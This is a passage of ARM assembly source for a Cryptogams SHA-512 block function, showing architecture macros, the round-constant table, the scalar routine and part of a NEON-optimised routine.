# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
# define CRYPTOGAMS_ARMV7_NEON (1<<0)
@ JW, MAY 2019: End defines from taken from arm_arch.h
@ Back to original Cryptogams code
#ifdef __ARMEL__
# define LO 0
# define HI 4
# define WORD64(hi0,lo0,hi1,lo1) .word lo0,hi0, lo1,hi1
#else
# define HI 0
# define LO 4
# define WORD64(hi0,lo0,hi1,lo1) .word hi0,lo0, hi1,lo1
#endif
#if defined(__thumb2__)
.syntax unified
.thumb
# define adrl adr
#else
.code 32
#endif
.text
.type K512,%object
.align 5
K512:
WORD64(0x428a2f98,0xd728ae22, 0x71374491,0x23ef65cd)
WORD64(0xb5c0fbcf,0xec4d3b2f, 0xe9b5dba5,0x8189dbbc)
WORD64(0x3956c25b,0xf348b538, 0x59f111f1,0xb605d019)
WORD64(0x923f82a4,0xaf194f9b, 0xab1c5ed5,0xda6d8118)
WORD64(0xd807aa98,0xa3030242, 0x12835b01,0x45706fbe)
WORD64(0x243185be,0x4ee4b28c, 0x550c7dc3,0xd5ffb4e2)
WORD64(0x72be5d74,0xf27b896f, 0x80deb1fe,0x3b1696b1)
WORD64(0x9bdc06a7,0x25c71235, 0xc19bf174,0xcf692694)
WORD64(0xe49b69c1,0x9ef14ad2, 0xefbe4786,0x384f25e3)
WORD64(0x0fc19dc6,0x8b8cd5b5, 0x240ca1cc,0x77ac9c65)
WORD64(0x2de92c6f,0x592b0275, 0x4a7484aa,0x6ea6e483)
WORD64(0x5cb0a9dc,0xbd41fbd4, 0x76f988da,0x831153b5)
WORD64(0x983e5152,0xee66dfab, 0xa831c66d,0x2db43210)
WORD64(0xb00327c8,0x98fb213f, 0xbf597fc7,0xbeef0ee4)
WORD64(0xc6e00bf3,0x3da88fc2, 0xd5a79147,0x930aa725)
WORD64(0x06ca6351,0xe003826f, 0x14292967,0x0a0e6e70)
WORD64(0x27b70a85,0x46d22ffc, 0x2e1b2138,0x5c26c926)
WORD64(0x4d2c6dfc,0x5ac42aed, 0x53380d13,0x9d95b3df)
WORD64(0x650a7354,0x8baf63de, 0x766a0abb,0x3c77b2a8)
WORD64(0x81c2c92e,0x47edaee6, 0x92722c85,0x1482353b)
WORD64(0xa2bfe8a1,0x4cf10364, 0xa81a664b,0xbc423001)
WORD64(0xc24b8b70,0xd0f89791, 0xc76c51a3,0x0654be30)
WORD64(0xd192e819,0xd6ef5218, 0xd6990624,0x5565a910)
WORD64(0xf40e3585,0x5771202a, 0x106aa070,0x32bbd1b8)
WORD64(0x19a4c116,0xb8d2d0c8, 0x1e376c08,0x5141ab53)
WORD64(0x2748774c,0xdf8eeb99, 0x34b0bcb5,0xe19b48a8)
WORD64(0x391c0cb3,0xc5c95a63, 0x4ed8aa4a,0xe3418acb)
WORD64(0x5b9cca4f,0x7763e373, 0x682e6ff3,0xd6b2b8a3)
WORD64(0x748f82ee,0x5defb2fc, 0x78a5636f,0x43172f60)
WORD64(0x84c87814,0xa1f0ab72, 0x8cc70208,0x1a6439ec)
WORD64(0x90befffa,0x23631e28, 0xa4506ceb,0xde82bde9)
WORD64(0xbef9a3f7,0xb2c67915, 0xc67178f2,0xe372532b)
WORD64(0xca273ece,0xea26619c, 0xd186b8c7,0x21c0c207)
WORD64(0xeada7dd6,0xcde0eb1e, 0xf57d4f7f,0xee6ed178)
WORD64(0x06f067aa,0x72176fba, 0x0a637dc5,0xa2c898a6)
WORD64(0x113f9804,0xbef90dae, 0x1b710b35,0x131c471b)
WORD64(0x28db77f5,0x23047d84, 0x32caab7b,0x40c72493)
WORD64(0x3c9ebe0a,0x15c9bebc, 0x431d67c4,0x9c100d4c)
WORD64(0x4cc5d4be,0xcb3e42b6, 0x597f299c,0xfc657e2a)
WORD64(0x5fcb6fab,0x3ad6faec, 0x6c44198c,0x4a475817)
.size K512,.-K512
.skip 32
.align 5
.globl cryptogams_sha512_block_data_order
.type cryptogams_sha512_block_data_order,%function
cryptogams_sha512_block_data_order:
.Lcryptogams_sha512_block_data_order:
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r3,pc,#8 @ cryptogams_sha512_block_data_order
#else
adr r3,.Lcryptogams_sha512_block_data_order
#endif
add r2,r1,r2,lsl#7 @ len to point at the end of inp
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
sub r14,r3,#672 @ K512
sub sp,sp,#9*8
ldr r7,[r0,#32+LO]
ldr r8,[r0,#32+HI]
ldr r9, [r0,#48+LO]
ldr r10, [r0,#48+HI]
ldr r11, [r0,#56+LO]
ldr r12, [r0,#56+HI]
.Loop:
str r9, [sp,#48+0]
str r10, [sp,#48+4]
str r11, [sp,#56+0]
str r12, [sp,#56+4]
ldr r5,[r0,#0+LO]
ldr r6,[r0,#0+HI]
ldr r3,[r0,#8+LO]
ldr r4,[r0,#8+HI]
ldr r9, [r0,#16+LO]
ldr r10, [r0,#16+HI]
ldr r11, [r0,#24+LO]
ldr r12, [r0,#24+HI]
str r3,[sp,#8+0]
str r4,[sp,#8+4]
str r9, [sp,#16+0]
str r10, [sp,#16+4]
str r11, [sp,#24+0]
str r12, [sp,#24+4]
ldr r3,[r0,#40+LO]
ldr r4,[r0,#40+HI]
str r3,[sp,#40+0]
str r4,[sp,#40+4]
.L00_15:
#if __ARM_ARCH__<7
ldrb r3,[r1,#7]
ldrb r9, [r1,#6]
ldrb r10, [r1,#5]
ldrb r11, [r1,#4]
ldrb r4,[r1,#3]
ldrb r12, [r1,#2]
orr r3,r3,r9,lsl#8
ldrb r9, [r1,#1]
orr r3,r3,r10,lsl#16
ldrb r10, [r1],#8
orr r3,r3,r11,lsl#24
orr r4,r4,r12,lsl#8
orr r4,r4,r9,lsl#16
orr r4,r4,r10,lsl#24
#else
ldr r3,[r1,#4]
ldr r4,[r1],#8
#ifdef __ARMEL__
rev r3,r3
rev r4,r4
#endif
#endif
@ Sigma1(x) (ROTR((x),14) ^ ROTR((x),18) ^ ROTR((x),41))
@ LO lo>>14^hi<<18 ^ lo>>18^hi<<14 ^ hi>>9^lo<<23
@ HI hi>>14^lo<<18 ^ hi>>18^lo<<14 ^ lo>>9^hi<<23
mov r9,r7,lsr#14
str r3,[sp,#64+0]
mov r10,r8,lsr#14
str r4,[sp,#64+4]
eor r9,r9,r8,lsl#18
ldr r11,[sp,#56+0] @ h.lo
eor r10,r10,r7,lsl#18
ldr r12,[sp,#56+4] @ h.hi
eor r9,r9,r7,lsr#18
eor r10,r10,r8,lsr#18
eor r9,r9,r8,lsl#14
eor r10,r10,r7,lsl#14
eor r9,r9,r8,lsr#9
eor r10,r10,r7,lsr#9
eor r9,r9,r7,lsl#23
eor r10,r10,r8,lsl#23 @ Sigma1(e)
adds r3,r3,r9
ldr r9,[sp,#40+0] @ f.lo
adc r4,r4,r10 @ T += Sigma1(e)
ldr r10,[sp,#40+4] @ f.hi
adds r3,r3,r11
ldr r11,[sp,#48+0] @ g.lo
adc r4,r4,r12 @ T += h
ldr r12,[sp,#48+4] @ g.hi
eor r9,r9,r11
str r7,[sp,#32+0]
eor r10,r10,r12
str r8,[sp,#32+4]
and r9,r9,r7
str r5,[sp,#0+0]
and r10,r10,r8
str r6,[sp,#0+4]
eor r9,r9,r11
ldr r11,[r14,#LO] @ K[i].lo
eor r10,r10,r12 @ Ch(e,f,g)
ldr r12,[r14,#HI] @ K[i].hi
adds r3,r3,r9
ldr r7,[sp,#24+0] @ d.lo
adc r4,r4,r10 @ T += Ch(e,f,g)
ldr r8,[sp,#24+4] @ d.hi
adds r3,r3,r11
and r9,r11,#0xff
adc r4,r4,r12 @ T += K[i]
adds r7,r7,r3
ldr r11,[sp,#8+0] @ b.lo
adc r8,r8,r4 @ d += T
teq r9,#148
ldr r12,[sp,#16+0] @ c.lo
#ifdef __thumb2__
it eq @ Thumb2 thing, sanity check in ARM
#endif
orreq r14,r14,#1
@ Sigma0(x) (ROTR((x),28) ^ ROTR((x),34) ^ ROTR((x),39))
@ LO lo>>28^hi<<4 ^ hi>>2^lo<<30 ^ hi>>7^lo<<25
@ HI hi>>28^lo<<4 ^ lo>>2^hi<<30 ^ lo>>7^hi<<25
mov r9,r5,lsr#28
mov r10,r6,lsr#28
eor r9,r9,r6,lsl#4
eor r10,r10,r5,lsl#4
eor r9,r9,r6,lsr#2
eor r10,r10,r5,lsr#2
eor r9,r9,r5,lsl#30
eor r10,r10,r6,lsl#30
eor r9,r9,r6,lsr#7
eor r10,r10,r5,lsr#7
eor r9,r9,r5,lsl#25
eor r10,r10,r6,lsl#25 @ Sigma0(a)
adds r3,r3,r9
and r9,r5,r11
adc r4,r4,r10 @ T += Sigma0(a)
ldr r10,[sp,#8+4] @ b.hi
orr r5,r5,r11
ldr r11,[sp,#16+4] @ c.hi
and r5,r5,r12
and r12,r6,r10
orr r6,r6,r10
orr r5,r5,r9 @ Maj(a,b,c).lo
and r6,r6,r11
adds r5,r5,r3
orr r6,r6,r12 @ Maj(a,b,c).hi
sub sp,sp,#8
adc r6,r6,r4 @ h += T
tst r14,#1
add r14,r14,#8
tst r14,#1
beq .L00_15
ldr r9,[sp,#184+0]
ldr r10,[sp,#184+4]
bic r14,r14,#1
.L16_79:
@ sigma0(x) (ROTR((x),1) ^ ROTR((x),8) ^ ((x)>>7))
@ LO lo>>1^hi<<31 ^ lo>>8^hi<<24 ^ lo>>7^hi<<25
@ HI hi>>1^lo<<31 ^ hi>>8^lo<<24 ^ hi>>7
mov r3,r9,lsr#1
ldr r11,[sp,#80+0]
mov r4,r10,lsr#1
ldr r12,[sp,#80+4]
eor r3,r3,r10,lsl#31
eor r4,r4,r9,lsl#31
eor r3,r3,r9,lsr#8
eor r4,r4,r10,lsr#8
eor r3,r3,r10,lsl#24
eor r4,r4,r9,lsl#24
eor r3,r3,r9,lsr#7
eor r4,r4,r10,lsr#7
eor r3,r3,r10,lsl#25
@ sigma1(x) (ROTR((x),19) ^ ROTR((x),61) ^ ((x)>>6))
@ LO lo>>19^hi<<13 ^ hi>>29^lo<<3 ^ lo>>6^hi<<26
@ HI hi>>19^lo<<13 ^ lo>>29^hi<<3 ^ hi>>6
mov r9,r11,lsr#19
mov r10,r12,lsr#19
eor r9,r9,r12,lsl#13
eor r10,r10,r11,lsl#13
eor r9,r9,r12,lsr#29
eor r10,r10,r11,lsr#29
eor r9,r9,r11,lsl#3
eor r10,r10,r12,lsl#3
eor r9,r9,r11,lsr#6
eor r10,r10,r12,lsr#6
ldr r11,[sp,#120+0]
eor r9,r9,r12,lsl#26
ldr r12,[sp,#120+4]
adds r3,r3,r9
ldr r9,[sp,#192+0]
adc r4,r4,r10
ldr r10,[sp,#192+4]
adds r3,r3,r11
adc r4,r4,r12
adds r3,r3,r9
adc r4,r4,r10
@ Sigma1(x) (ROTR((x),14) ^ ROTR((x),18) ^ ROTR((x),41))
@ LO lo>>14^hi<<18 ^ lo>>18^hi<<14 ^ hi>>9^lo<<23
@ HI hi>>14^lo<<18 ^ hi>>18^lo<<14 ^ lo>>9^hi<<23
mov r9,r7,lsr#14
str r3,[sp,#64+0]
mov r10,r8,lsr#14
str r4,[sp,#64+4]
eor r9,r9,r8,lsl#18
ldr r11,[sp,#56+0] @ h.lo
eor r10,r10,r7,lsl#18
ldr r12,[sp,#56+4] @ h.hi
eor r9,r9,r7,lsr#18
eor r10,r10,r8,lsr#18
eor r9,r9,r8,lsl#14
eor r10,r10,r7,lsl#14
eor r9,r9,r8,lsr#9
eor r10,r10,r7,lsr#9
eor r9,r9,r7,lsl#23
eor r10,r10,r8,lsl#23 @ Sigma1(e)
adds r3,r3,r9
ldr r9,[sp,#40+0] @ f.lo
adc r4,r4,r10 @ T += Sigma1(e)
ldr r10,[sp,#40+4] @ f.hi
adds r3,r3,r11
ldr r11,[sp,#48+0] @ g.lo
adc r4,r4,r12 @ T += h
ldr r12,[sp,#48+4] @ g.hi
eor r9,r9,r11
str r7,[sp,#32+0]
eor r10,r10,r12
str r8,[sp,#32+4]
and r9,r9,r7
str r5,[sp,#0+0]
and r10,r10,r8
str r6,[sp,#0+4]
eor r9,r9,r11
ldr r11,[r14,#LO] @ K[i].lo
eor r10,r10,r12 @ Ch(e,f,g)
ldr r12,[r14,#HI] @ K[i].hi
adds r3,r3,r9
ldr r7,[sp,#24+0] @ d.lo
adc r4,r4,r10 @ T += Ch(e,f,g)
ldr r8,[sp,#24+4] @ d.hi
adds r3,r3,r11
and r9,r11,#0xff
adc r4,r4,r12 @ T += K[i]
adds r7,r7,r3
ldr r11,[sp,#8+0] @ b.lo
adc r8,r8,r4 @ d += T
teq r9,#23
ldr r12,[sp,#16+0] @ c.lo
#ifdef __thumb2__
it eq @ Thumb2 thing, sanity check in ARM
#endif
orreq r14,r14,#1
@ Sigma0(x) (ROTR((x),28) ^ ROTR((x),34) ^ ROTR((x),39))
@ LO lo>>28^hi<<4 ^ hi>>2^lo<<30 ^ hi>>7^lo<<25
@ HI hi>>28^lo<<4 ^ lo>>2^hi<<30 ^ lo>>7^hi<<25
mov r9,r5,lsr#28
mov r10,r6,lsr#28
eor r9,r9,r6,lsl#4
eor r10,r10,r5,lsl#4
eor r9,r9,r6,lsr#2
eor r10,r10,r5,lsr#2
eor r9,r9,r5,lsl#30
eor r10,r10,r6,lsl#30
eor r9,r9,r6,lsr#7
eor r10,r10,r5,lsr#7
eor r9,r9,r5,lsl#25
eor r10,r10,r6,lsl#25 @ Sigma0(a)
adds r3,r3,r9
and r9,r5,r11
adc r4,r4,r10 @ T += Sigma0(a)
ldr r10,[sp,#8+4] @ b.hi
orr r5,r5,r11
ldr r11,[sp,#16+4] @ c.hi
and r5,r5,r12
and r12,r6,r10
orr r6,r6,r10
orr r5,r5,r9 @ Maj(a,b,c).lo
and r6,r6,r11
adds r5,r5,r3
orr r6,r6,r12 @ Maj(a,b,c).hi
sub sp,sp,#8
adc r6,r6,r4 @ h += T
tst r14,#1
add r14,r14,#8
#ifdef __thumb2__
ittt eq @ Thumb2 thing, sanity check in ARM
#endif
ldreq r9,[sp,#184+0]
ldreq r10,[sp,#184+4]
beq .L16_79
bic r14,r14,#1
ldr r3,[sp,#8+0]
ldr r4,[sp,#8+4]
ldr r9, [r0,#0+LO]
ldr r10, [r0,#0+HI]
ldr r11, [r0,#8+LO]
ldr r12, [r0,#8+HI]
adds r9,r5,r9
str r9, [r0,#0+LO]
adc r10,r6,r10
str r10, [r0,#0+HI]
adds r11,r3,r11
str r11, [r0,#8+LO]
adc r12,r4,r12
str r12, [r0,#8+HI]
ldr r5,[sp,#16+0]
ldr r6,[sp,#16+4]
ldr r3,[sp,#24+0]
ldr r4,[sp,#24+4]
ldr r9, [r0,#16+LO]
ldr r10, [r0,#16+HI]
ldr r11, [r0,#24+LO]
ldr r12, [r0,#24+HI]
adds r9,r5,r9
str r9, [r0,#16+LO]
adc r10,r6,r10
str r10, [r0,#16+HI]
adds r11,r3,r11
str r11, [r0,#24+LO]
adc r12,r4,r12
str r12, [r0,#24+HI]
ldr r3,[sp,#40+0]
ldr r4,[sp,#40+4]
ldr r9, [r0,#32+LO]
ldr r10, [r0,#32+HI]
ldr r11, [r0,#40+LO]
ldr r12, [r0,#40+HI]
adds r7,r7,r9
str r7,[r0,#32+LO]
adc r8,r8,r10
str r8,[r0,#32+HI]
adds r11,r3,r11
str r11, [r0,#40+LO]
adc r12,r4,r12
str r12, [r0,#40+HI]
ldr r5,[sp,#48+0]
ldr r6,[sp,#48+4]
ldr r3,[sp,#56+0]
ldr r4,[sp,#56+4]
ldr r9, [r0,#48+LO]
ldr r10, [r0,#48+HI]
ldr r11, [r0,#56+LO]
ldr r12, [r0,#56+HI]
adds r9,r5,r9
str r9, [r0,#48+LO]
adc r10,r6,r10
str r10, [r0,#48+HI]
adds r11,r3,r11
str r11, [r0,#56+LO]
adc r12,r4,r12
str r12, [r0,#56+HI]
add sp,sp,#640
sub r14,r14,#640
teq r1,r2
bne .Loop
add sp,sp,#8*9 @ destroy frame
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_sha512_block_data_order,.-cryptogams_sha512_block_data_order
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.align 4
.globl cryptogams_sha512_block_data_order_neon
.type cryptogams_sha512_block_data_order_neon,%function
cryptogams_sha512_block_data_order_neon:
dmb @ errata #451034 on early Cortex A8
add r2,r1,r2,lsl#7 @ len to point at the end of inp
adr r3,K512
vstmdb sp!,{d8-d15}
vldmia r0,{d16,d17,d18,d19,d20,d21,d22,d23} @ load context
.Loop_neon:
vshr.u64 d24,d20,#14 @ 0
#if 0<16
vld1.64 {d0},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d20,#18
#if 0>0
vadd.i64 d16,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d20,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d20,#50
vsli.64 d25,d20,#46
vmov d29,d20
vsli.64 d26,d20,#23
#if 0<16 && defined(__ARMEL__)
vrev64.8 d0,d0
#endif
veor d25,d24
vbsl d29,d21,d22 @ Ch(e,f,g)
vshr.u64 d24,d16,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d23
vshr.u64 d25,d16,#34
vsli.64 d24,d16,#36
vadd.i64 d27,d26
vshr.u64 d26,d16,#39
vadd.i64 d28,d0
vsli.64 d25,d16,#30
veor d30,d16,d17
vsli.64 d26,d16,#25
veor d23,d24,d25
vadd.i64 d27,d28
vbsl d30,d18,d17 @ Maj(a,b,c)
veor d23,d26 @ Sigma0(a)
vadd.i64 d19,d27
vadd.i64 d30,d27
@ vadd.i64 d23,d30
vshr.u64 d24,d19,#14 @ 1
#if 1<16
vld1.64 {d1},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d19,#18
#if 1>0
vadd.i64 d23,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d19,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d19,#50
vsli.64 d25,d19,#46
vmov d29,d19
vsli.64 d26,d19,#23
#if 1<16 && defined(__ARMEL__)
vrev64.8 d1,d1
#endif
veor d25,d24
vbsl d29,d20,d21 @ Ch(e,f,g)
vshr.u64 d24,d23,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d22
vshr.u64 d25,d23,#34
vsli.64 d24,d23,#36
vadd.i64 d27,d26
vshr.u64 d26,d23,#39
vadd.i64 d28,d1
vsli.64 d25,d23,#30
veor d30,d23,d16
vsli.64 d26,d23,#25
veor d22,d24,d25
vadd.i64 d27,d28
vbsl d30,d17,d16 @ Maj(a,b,c)
veor d22,d26 @ Sigma0(a)
vadd.i64 d18,d27
vadd.i64 d30,d27
@ vadd.i64 d22,d30
vshr.u64 d24,d18,#14 @ 2
#if 2<16
vld1.64 {d2},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d18,#18
#if 2>0
vadd.i64 d22,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d18,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d18,#50
vsli.64 d25,d18,#46
vmov d29,d18
vsli.64 d26,d18,#23
#if 2<16 && defined(__ARMEL__)
vrev64.8 d2,d2
#endif
veor d25,d24
vbsl d29,d19,d20 @ Ch(e,f,g)
vshr.u64 d24,d22,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d21
vshr.u64 d25,d22,#34
vsli.64 d24,d22,#36
vadd.i64 d27,d26
vshr.u64 d26,d22,#39
vadd.i64 d28,d2
vsli.64 d25,d22,#30
veor d30,d22,d23
vsli.64 d26,d22,#25
veor d21,d24,d25
vadd.i64 d27,d28
vbsl d30,d16,d23 @ Maj(a,b,c)
veor d21,d26 @ Sigma0(a)
vadd.i64 d17,d27
vadd.i64 d30,d27
@ vadd.i64 d21,d30
vshr.u64 d24,d17,#14 @ 3
#if 3<16
vld1.64 {d3},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d17,#18
#if 3>0
vadd.i64 d21,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d17,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d17,#50
vsli.64 d25,d17,#46
vmov d29,d17
vsli.64 d26,d17,#23
#if 3<16 && defined(__ARMEL__)
vrev64.8 d3,d3
#endif
veor d25,d24
vbsl d29,d18,d19 @ Ch(e,f,g)
vshr.u64 d24,d21,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d20
vshr.u64 d25,d21,#34
vsli.64 d24,d21,#36
vadd.i64 d27,d26
vshr.u64 d26,d21,#39
vadd.i64 d28,d3
vsli.64 d25,d21,#30
veor d30,d21,d22
vsli.64 d26,d21,#25
veor d20,d24,d25
vadd.i64 d27,d28
vbsl d30,d23,d22 @ Maj(a,b,c)
veor d20,d26 @ Sigma0(a)
vadd.i64 d16,d27
vadd.i64 d30,d27
@ vadd.i64 d20,d30
vshr.u64 d24,d16,#14 @ 4
#if 4<16
vld1.64 {d4},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d16,#18
#if 4>0
vadd.i64 d20,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d16,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d16,#50
vsli.64 d25,d16,#46
vmov d29,d16
vsli.64 d26,d16,#23
#if 4<16 && defined(__ARMEL__)
vrev64.8 d4,d4
#endif
veor d25,d24
vbsl d29,d17,d18 @ Ch(e,f,g)
vshr.u64 d24,d20,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d19
vshr.u64 d25,d20,#34
vsli.64 d24,d20,#36
vadd.i64 d27,d26
vshr.u64 d26,d20,#39
vadd.i64 d28,d4
vsli.64 d25,d20,#30
veor d30,d20,d21
vsli.64 d26,d20,#25
veor d19,d24,d25
vadd.i64 d27,d28
vbsl d30,d22,d21 @ Maj(a,b,c)
veor d19,d26 @ Sigma0(a)
vadd.i64 d23,d27
vadd.i64 d30,d27
@ vadd.i64 d19,d30
vshr.u64 d24,d23,#14 @ 5
#if 5<16
vld1.64 {d5},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d23,#18
#if 5>0
vadd.i64 d19,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d23,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d23,#50
vsli.64 d25,d23,#46
vmov d29,d23
vsli.64 d26,d23,#23
#if 5<16 && defined(__ARMEL__)
vrev64.8 d5,d5
#endif
veor d25,d24
vbsl d29,d16,d17 @ Ch(e,f,g)
vshr.u64 d24,d19,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d18
vshr.u64 d25,d19,#34
vsli.64 d24,d19,#36
vadd.i64 d27,d26
vshr.u64 d26,d19,#39
vadd.i64 d28,d5
vsli.64 d25,d19,#30
veor d30,d19,d20
vsli.64 d26,d19,#25
veor d18,d24,d25
vadd.i64 d27,d28
vbsl d30,d21,d20 @ Maj(a,b,c)
veor d18,d26 @ Sigma0(a)
vadd.i64 d22,d27
vadd.i64 d30,d27
@ vadd.i64 d18,d30
vshr.u64 d24,d22,#14 @ 6
#if 6<16
vld1.64 {d6},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d22,#18
#if 6>0
vadd.i64 d18,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d22,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d22,#50
vsli.64 d25,d22,#46
vmov d29,d22
vsli.64 d26,d22,#23
#if 6<16 && defined(__ARMEL__)
vrev64.8 d6,d6
#endif
veor d25,d24
vbsl d29,d23,d16 @ Ch(e,f,g)
vshr.u64 d24,d18,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d17
vshr.u64 d25,d18,#34
vsli.64 d24,d18,#36
vadd.i64 d27,d26
vshr.u64 d26,d18,#39
vadd.i64 d28,d6
vsli.64 d25,d18,#30
veor d30,d18,d19
vsli.64 d26,d18,#25
veor d17,d24,d25
vadd.i64 d27,d28
vbsl d30,d20,d19 @ Maj(a,b,c)
veor d17,d26 @ Sigma0(a)
vadd.i64 d21,d27
vadd.i64 d30,d27
@ vadd.i64 d17,d30
vshr.u64 d24,d21,#14 @ 7
#if 7<16
vld1.64 {d7},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d21,#18
#if 7>0
vadd.i64 d17,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d21,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d21,#50
vsli.64 d25,d21,#46
vmov d29,d21
vsli.64 d26,d21,#23
#if 7<16 && defined(__ARMEL__)
vrev64.8 d7,d7
#endif
veor d25,d24
vbsl d29,d22,d23 @ Ch(e,f,g)
vshr.u64 d24,d17,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d16
vshr.u64 d25,d17,#34
vsli.64 d24,d17,#36
vadd.i64 d27,d26
vshr.u64 d26,d17,#39
vadd.i64 d28,d7
vsli.64 d25,d17,#30
veor d30,d17,d18
vsli.64 d26,d17,#25
veor d16,d24,d25
vadd.i64 d27,d28
vbsl d30,d19,d18 @ Maj(a,b,c)
veor d16,d26 @ Sigma0(a)
vadd.i64 d20,d27
vadd.i64 d30,d27
@ vadd.i64 d16,d30
vshr.u64 d24,d20,#14 @ 8
#if 8<16
vld1.64 {d8},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d20,#18
#if 8>0
vadd.i64 d16,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d20,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d20,#50
vsli.64 d25,d20,#46
vmov d29,d20
vsli.64 d26,d20,#23
#if 8<16 && defined(__ARMEL__)
vrev64.8 d8,d8
#endif
veor d25,d24
vbsl d29,d21,d22 @ Ch(e,f,g)
vshr.u64 d24,d16,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d23
vshr.u64 d25,d16,#34
vsli.64 d24,d16,#36
vadd.i64 d27,d26
vshr.u64 d26,d16,#39
vadd.i64 d28,d8
vsli.64 d25,d16,#30
veor d30,d16,d17
vsli.64 d26,d16,#25
veor d23,d24,d25
vadd.i64 d27,d28
vbsl d30,d18,d17 @ Maj(a,b,c)
veor d23,d26 @ Sigma0(a)
vadd.i64 d19,d27
vadd.i64 d30,d27
@ vadd.i64 d23,d30
vshr.u64 d24,d19,#14 @ 9
#if 9<16
vld1.64 {d9},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d19,#18
#if 9>0
vadd.i64 d23,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d19,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d19,#50
vsli.64 d25,d19,#46
vmov d29,d19
vsli.64 d26,d19,#23
#if 9<16 && defined(__ARMEL__)
vrev64.8 d9,d9
#endif
veor d25,d24
vbsl d29,d20,d21 @ Ch(e,f,g)
vshr.u64 d24,d23,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d22
vshr.u64 d25,d23,#34
vsli.64 d24,d23,#36
vadd.i64 d27,d26
vshr.u64 d26,d23,#39
vadd.i64 d28,d9
vsli.64 d25,d23,#30
veor d30,d23,d16
vsli.64 d26,d23,#25
veor d22,d24,d25
vadd.i64 d27,d28
vbsl d30,d17,d16 @ Maj(a,b,c)
veor d22,d26 @ Sigma0(a)
vadd.i64 d18,d27
vadd.i64 d30,d27
@ vadd.i64 d22,d30
vshr.u64 d24,d18,#14 @ 10
#if 10<16
vld1.64 {d10},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d18,#18
#if 10>0
vadd.i64 d22,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d18,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d18,#50
